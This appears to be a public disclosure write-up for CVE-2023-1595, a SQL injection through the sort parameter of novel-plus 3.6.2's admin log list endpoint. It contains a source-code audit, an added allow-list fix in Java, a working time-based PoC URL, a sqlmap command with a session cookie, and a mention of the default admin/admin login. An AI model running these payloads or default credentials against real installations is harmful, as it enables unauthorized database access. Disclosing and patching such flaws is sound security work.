CVE-2023-1595: novel-plus-v3.6.2----Background-SQL-Injection-Vulnerability-/novel-plus v3.6.2 -- Background SQL Injection Vulnerability.md at main · 1610349395/novel-plus-v3.6.2----Background-SQL-Injection-Vulnerabi
A vulnerability has been found in novel-plus 3.6.2 and classified as critical. Affected by this vulnerability is an unknown functionality of the file common/log/list. The manipulation of the argument sort leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223663.
novel-plus v3.6.2 – Background SQL Injection Vulnerability
Project address: https://github.com/201206030/novel-plus
Affected product: novel-plus v3.6.2
Vulnerability description: Novel Plus is a multi-terminal (PC, WAP) reading platform and fully featured CMS for original literature. It is built on Spring Cloud and uses MyBatis as the persistence layer. It has nearly 3k stars on GitHub and a large user base. The admin background contains a SQL injection vulnerability that can be used to read all database contents; in severe cases it can be leveraged to obtain a shell, which poses considerable harm.
Vulnerability White Box Audit:
Environment setup: for details, refer to https://www.xxyopen.com/2022/07/18/doc/novel-plus/install/package.html
After setup succeeds, access the project as shown in the figure:
Log in using the default credentials admin/admin
Source code audit:
Use the IDEA shortcut to search the whole project for '${'. In MyBatis, ${} interpolates the raw value into the SQL text instead of binding it as a precompiled (prepared-statement) parameter.
Open LogMapper.xml and view the code.
The parameters ${sort} and ${order}, which are not bound as prepared-statement parameters, appear in the <select> tag with id=list, and they are only used when the sort parameter is not empty.
Go back to the DAO layer and find the implementation of this select tag. It is in LogDao.java, and the parameter passed in is a Map.
Continue by searching for callers of this function. Using the IDEA shortcut Ctrl+left click on the list function, we find that LogServiceImpl.java calls it.
In LogServiceImpl.java, the queryList function calls the list function and passes in the query parameter, which is also a Map.
Ctrl+left click again to find who calls queryList. It is called in LogController.java, where the parameters are fully controllable by the request. The path is http://localhost/common/log/list
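The root cause is that `${sort}` and `${order}` land in ORDER BY as raw text, and `#{}` cannot be used there because it would bind a string literal rather than a column name. The fix is an allow-list. The following is an added example, not novel-plus code; the column names and the default column are hypothetical placeholders for the real log table schema.

```java
import java.util.Locale;
import java.util.Set;

/**
 * Allow-list guard for ORDER BY fragments. MyBatis ${...} interpolates the raw
 * string into the SQL text, so the only safe value is one chosen from a fixed
 * set of identifiers; anything else falls back to a default.
 */
public class SortParamGuard {

    // Hypothetical column names of the log table; adjust to the real schema.
    private static final Set<String> ALLOWED_SORT_COLUMNS =
            Set.of("id", "username", "operation", "create_time");
    private static final Set<String> ALLOWED_ORDER = Set.of("asc", "desc");

    /** Returns sort unchanged only if it is an allowed column, else the default. */
    public static String safeSort(String sort, String defaultColumn) {
        if (sort == null || sort.isEmpty()) {
            return defaultColumn;
        }
        // Exact match only: no trimming, case folding or partial matching that
        // could let extra SQL text slip through alongside a valid column name.
        return ALLOWED_SORT_COLUMNS.contains(sort) ? sort : defaultColumn;
    }

    /** Returns "asc" or "desc" only; anything else becomes "desc". */
    public static String safeOrder(String order) {
        if (order == null) {
            return "desc";
        }
        String lowered = order.toLowerCase(Locale.ROOT);
        return ALLOWED_ORDER.contains(lowered) ? lowered : "desc";
    }

    /** Builds the clause that would replace "order by ${sort} ${order}" in the mapper. */
    public static String orderByClause(String sort, String order) {
        return "order by " + safeSort(sort, "id") + " " + safeOrder(order);
    }

    public static void main(String[] args) {
        // Constructed inputs: a legitimate column, then a sort value shaped like
        // the time-based payload in the PoC; the second is replaced by the default.
        System.out.println(orderByClause("username", "ASC"));
        System.out.println(orderByClause("(select*from(select sleep(1)union select 1)a)", "desc"));
    }
}
```

The validated strings can then be placed in the query Map before it reaches LogDao, so the mapper's `${sort} ${order}` only ever sees allow-listed identifiers.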
PoC:
http://127.0.0.1/common/log/list?limit=10&offset=0&operation=&order=desc&sort=(select*from(select%2Bsleep(1)union%2F**%2Fselect%2B1)a)&username=
Vulnerability reproduction:
First, log in to the admin background with the weak password admin/admin, then run sqlmap against the target URL with the session cookie:
python3 sqlmap.py -u "http://127.0.0.1/common/log/list?limit=10&offset=0&operation=&order=desc&sort=1" --cookie="JSESSIONID=6ab3b1c7-549b-4fc6-b04e-60f9cd4caea3"
Burp delay injection test: